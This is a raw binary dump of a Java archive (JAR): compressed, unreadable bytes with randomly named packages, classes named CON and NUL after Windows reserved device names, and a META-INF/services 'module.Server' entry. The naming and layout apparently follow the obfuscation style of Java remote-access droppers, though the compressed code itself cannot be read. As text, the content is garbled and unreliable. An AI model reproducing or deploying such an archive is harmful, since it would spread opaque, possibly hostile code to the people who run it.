PK
     `L�H               JhZmoXqwkzaWU/PK
     `L�H            $   JhZmoXqwkzaWU/NVxjKxLyoiLKBnhCEaQyv/PK
     `L�H            	  META-INF/��  PK
    `L�H�_d@�  �  -  JhZmoXqwkzaWU/NVxjKxLyoiLKBnhCEaQyv/CON.class  �      �      ��[/A�ߏ�n[�Tu>�[7��D\(ش��F����ΰ�u�U$���~��ie/J�\|3���|�>>_��c6�(:L�` �BWMH��m`�@A_r�,�S�<!�����	���wٱ��@ЊN�^ $Si�Ī��/Zہ���"!*��+c�g��I`"���^���ǀ��B��Z���Xێ_u|Y����0X/�
+w\�%�UZ�8�,]tQ	j��Y��u�?����[Ю�K���σ�rvu�b���qvX����wlo���oJ�7��p��~�Yc[�U+���-j�.g��qf���S�ݵ哞������	�E:H=-r6){��6�z��)�YObc�:B`��Z�Ms�h>zD���F>��!?Z��Bq+ھ�S߻�3/�o �:|PK
    `L�H ��  p	  -  JhZmoXqwkzaWU/NVxjKxLyoiLKBnhCEaQyv/NUL.class  p	            �U�SW�]�ɆuA���h�$�V�"�b
��Jxj�,�b�7ڗ�~�w�t:��KGS:�N?�C���Ԟ�%r��9�����;w���? ����Z�F|���E�%��WB-�m|�I8?I8�#"�q��9&��E<#�'$t�$_uJ8��<�Sĳ"��.��Ф2��5��7>�Ƭ���Y���*�-��}9k��ѩ�u������ax��W\!#��SS�Sj�63�����\%���'���	��2̄2k�����p)�kd��R*�*$d<���Wß�i��j�8##��2�G����qA�2�#$�v����u�Q��A����(��v�G��1�!�<UT�F	��랉�K3�X;��l6lX=FN��ز�c$IY�5i#�K��~՜RMgV�,b�e�N�V�(�ݏ^�g�{q(����oC˥�@�e��mu�	ݴ��(|��,u �C�X+3��>��e���J�A�U)�W�x 1y坑�bc�5�)����Z<j����)��,-�O��jj1����Me���zM�KE���,��Z�|)����fy���m�^��o�ˢ,k˘�},�%	ch%���ĮDL%F�;ݞъ��]�)5�����q��SpI�JZ��"H��c�E$$$1!�2��r_P��/�_A��S$VMϪ���ܘZ�q����g��#���'�d��
��P�9bI���;�	Ș���-�ݣ� �����D/�{�>7H��6��������)�bm�:͵��
��)�#�'ԛI�W��\S�������3�YC�?�'����)x DBdԽ����e��/�7��кAz<:Κ���jN�9�a58�	�+q|��)æ��Xfض׳���Ӧ�N|I��P�pc��D�_c����Uu.�����VǨ|O��)��;l4on��.��C�=���Dr�q'��[��*�j�.����V�.�^��"?z�#wa[�]���+���Zb7\��K'�~V�:�.@��6�EU�	-�6z`�/����e<�WŰm�oV�/�.����o��%�Fa[|�B[�04\��6?����QET����^����C-o}���6���""T��7�6*�>*�M:�-�PW��}��N�^���ƈ��ą#�h�+ m��jf��)!�p�3��#:#��|m�{���.D�Ǆ�hg�]j�Ƣ���c����k��s�>�^kt�И��h�r��Dos��v�U�h!��T��-�����_\�L3�3��PK
     bL�H               META-INF/services/PK
    bL�HS�˄)   '     META-INF/services/module.Server  '       )       �ʈ�͏(,ϮJ����������v��pvM�,�s�� PK
     `L�H                      �A    JhZmoXqwkzaWU/PK
     `L�H            $          �A,   JhZmoXqwkzaWU/NVxjKxLyoiLKBnhCEaQyv/PK
     `L�H            	         �An   META-INF/��  PK
    `L�H�_d@�  �  -           ���   JhZmoXqwkzaWU/NVxjKxLyoiLKBnhCEaQyv/CON.classPK
    `L�H ��  p	  -           ���  JhZmoXqwkzaWU/NVxjKxLyoiLKBnhCEaQyv/NUL.classPK
     bL�H                      �A
  META-INF/services/PK
    bL�HS�˄)   '              ��:  META-INF/services/module.ServerPK        �    